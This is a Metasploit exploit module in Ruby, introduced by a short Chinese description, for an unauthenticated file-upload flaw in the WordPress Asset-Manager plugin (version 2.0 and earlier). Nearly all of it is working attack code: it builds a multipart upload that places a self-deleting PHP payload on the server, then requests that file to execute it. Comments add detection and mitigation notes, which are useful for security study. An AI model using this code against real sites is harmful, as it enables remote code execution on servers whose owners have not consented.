这个模块利用的是在 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞（已收录于 Metasploit 漏洞库）：插件允许在没有身份验证的情况下把一个 PHP 文件上传到临时目录，从而导致任意代码执行。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
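require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file-upload flaw in the
# WordPress Asset-Manager plugin (<= 2.0).
#
# Attack surface, as exercised below: a multipart POST to
# wp-content/plugins/asset-manager/upload.php carrying a "Filedata" part is
# accepted with no session or nonce, and the stored file is then reachable
# under wp-content/uploads/assets/temp/, where the web server executes it.
#
# Defender notes:
#   * Detection: an access-log pair of POST .../asset-manager/upload.php
#     followed shortly by GET .../uploads/assets/temp/<5 letters>.php from the
#     same client. The payload is requested with :unlink_self, so presumably
#     the file removes itself and the log entries are the main artifact.
#   * Mitigation: remove the plugin (no fixed release is named here) and deny
#     PHP execution under wp-content/uploads at the web-server layer so an
#     uploaded script cannot run even if the upload succeeds.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (name, description, references, payload
  # constraints, targets) and the TARGETURI option.
  #
  # @param info [Hash] metadata merged via update_info; defaults to {}
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http:// www.myhack58.com /' ]
        ],
      'Payload'        =>
        {
          # A NUL would terminate the PHP source on the way through the upload.
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        # Base path of the WordPress install; plugin and upload paths are
        # appended to it below.
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Uploads a self-deleting PHP payload through upload.php, then requests it
  # from the temp directory so the web server executes it.
  #
  # Aborts via fail_with when the upload response is missing, is not HTTP 200,
  # or does not echo the uploaded filename, and when the execution request
  # returns a non-200 status. A nil response on the execution step is
  # deliberately not treated as failure: the payload may have run and dropped
  # the connection before any HTTP reply was sent.
  def exploit
    uri = target_uri.path
    uri << '/' unless uri.end_with?('/')
    peer = "#{rhost}:#{rport}"

    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Drop the CRLF Rex::MIME emits ahead of the first boundary so the body
    # starts directly with the boundary line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # Success is inferred from the response echoing the stored filename; the
    # name is escaped so the '.' in ".php" is matched literally.
    unless res && res.code == 200 && res.body =~ /#{Regexp.escape(payload_name)}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    if res && res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end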